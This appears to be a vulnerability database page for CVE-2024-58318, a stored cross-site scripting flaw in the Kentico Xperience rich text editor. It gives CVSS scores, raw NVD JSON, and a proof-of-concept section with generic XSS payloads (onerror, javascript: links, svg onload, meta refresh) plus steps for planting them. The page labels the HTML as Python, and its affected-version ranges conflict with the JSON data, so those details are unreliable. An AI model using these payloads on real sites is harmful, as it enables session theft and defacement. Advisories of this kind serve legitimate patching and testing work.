CVE-2024-58318

Description

A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the rich text editor component for page and form builders. Attackers can exploit this vulnerability by entering malicious URIs, potentially allowing malicious scripts to execute in users' browsers.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE

Kentico Xperience < 13.0.200

Kentico Xperience < 14.0.200

Kentico Xperience < 15.0.200

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2024-58318 PoC: Stored XSS via Rich Text Editor -->
<!-- Attack Vector: Inject malicious URI/JavaScript in Kentico Xperience rich text editor -->

<!-- Method 1: Using JavaScript URI -->
<img src="x" onerror="javascript:alert(document.cookie)">

<!-- Method 2: Using data URI -->
<a href="javascript:alert('XSS');">Click me</a>

<!-- Method 3: Using event handlers -->
<svg/onload=alert(document.domain)>

<!-- Method 4: Using meta refresh with JavaScript -->
<meta http-equiv="refresh" content="0;javascript:alert('XSS')">

<!-- Exploitation Steps: -->
<!-- 1. Login to Kentico Xperience admin panel -->
<!-- 2. Navigate to Page Builder or Form Builder -->
<!-- 3. Open Rich Text Editor -->
<!-- 4. Insert malicious payload -->
<!-- 5. Save/Publish the content -->
<!-- 6. When victim views the page, XSS will execute -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58318
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58318
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58318/
[4] VulDB https://vuldb.com/cve/CVE-2024-58318
[5] https://devnet.kentico.com/download/hotfixes
[6] https://www.vulncheck.com/advisories/kentico-xperience-rich-text-editor-stored-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58318", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:53.637", "lastModified": "2025-12-27T17:15:46.120", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the rich text editor component for page and form builders. Attackers can exploit this vulnerability by entering malicious URIs, potentially allowing malicious scripts to execute in users' browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.162", "matchCriteriaId": "0F40E2AC-38B4-40F6-BF8E-CB31DE5A01D0"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-rich-text-editor-stored-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}